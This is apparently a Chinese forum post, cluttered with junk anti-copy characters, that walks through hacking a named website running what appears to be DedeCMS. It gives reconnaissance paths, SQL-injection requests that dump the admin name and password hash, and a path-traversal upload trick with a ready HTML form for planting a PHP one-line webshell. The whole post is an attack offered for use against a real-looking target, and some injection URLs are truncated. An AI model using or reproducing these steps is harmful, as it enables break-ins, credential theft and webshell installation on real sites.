①注入漏洞。
& X9 Y) i3 B+ ^$ {+ v2 j" Z这站 http://www.political-security.com/# L9 f; N+ w2 d' o4 n% Y
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,+ n( b! B6 e6 p& G/ I
www.political-security.com/data/mysql_error_trace.inc 爆后台( Y. d: Z- @+ @4 Z9 x2 _1 O4 r( N
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
, c% d. I" I8 o- F* l然后写上语句 . i/ a) y! Y9 y, z5 J q6 G+ x2 |9 p1 a7 R
查看管理员帐号' Q5 `, N9 W4 y! j$ {, Z
http://www.political-security.co ... &membergroup=@`+ W# u( g) S# L0 ~7 w; p
4 f5 n; B8 I0 E% @/ t4 S4 ~admin
4 b$ x f$ }* z* h. t# S4 @
3 ^6 `0 u( |4 |/ e2 H1 P# _查看管理员密码" q* P$ I! a$ ? f3 Y! k6 a5 U. u
http://www.political-security.co ... &membergroup=@`
7 }% S; R+ w# W% I( Q1 ~, W8 c7 e# }; V6 a5 Z7 ~
8d29b1ef9f8c5a5af429
" d# X9 N* S4 N( ^& [8 w$ q. D" V$ `7 Y) o
查看管理员密码
; g! [) M0 P3 a+ K9 u, L: }
7 o" r, G5 Y& h4 s( \1 V* t- G得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
" m0 V$ `7 i4 P; K+ ]2 Z: s6 b8 M W
8d2
& Z' }: |* [4 Z8 I9 h9b1ef9f8c5a5af42
4 ~6 H# I6 W/ C5 ?' G90 J" E# c0 r3 J( G& b! l
! Q8 v/ e9 i" L, C7 U+ T
cmd5没解出来 只好测试第二个方法
0 O5 r. h5 G7 H/ y4 ^4 I5 u5 k1 J9 i; }8 ~- v2 t" \# E( K
' m* y2 Q4 q7 I ~& c) l1 a
②上传漏洞:
- P7 ?" \8 X9 \. u6 I
/ [. F+ `4 t* l1 \0 V* X- A& E只要登陆会员中心,然后访问页面链接/ X$ G& X! Q; R( e9 Z
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”8 n2 I* u& g" T! Q% n& o# k
' N2 M3 x8 U# ]* ?0 q- r' ?( t
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
8 D) n9 r3 j0 h) l7 c0 Q' p3 c' [6 w+ @- A$ P
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm3 w. o+ `$ S/ u; J1 y1 ^ ?
( b$ u3 u l, F/ I
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
( |/ i7 _( a5 q6 p% v1 n' S/ k或者
?5 u! r3 K( S: h) ]: \0 [' q即可上传成功 |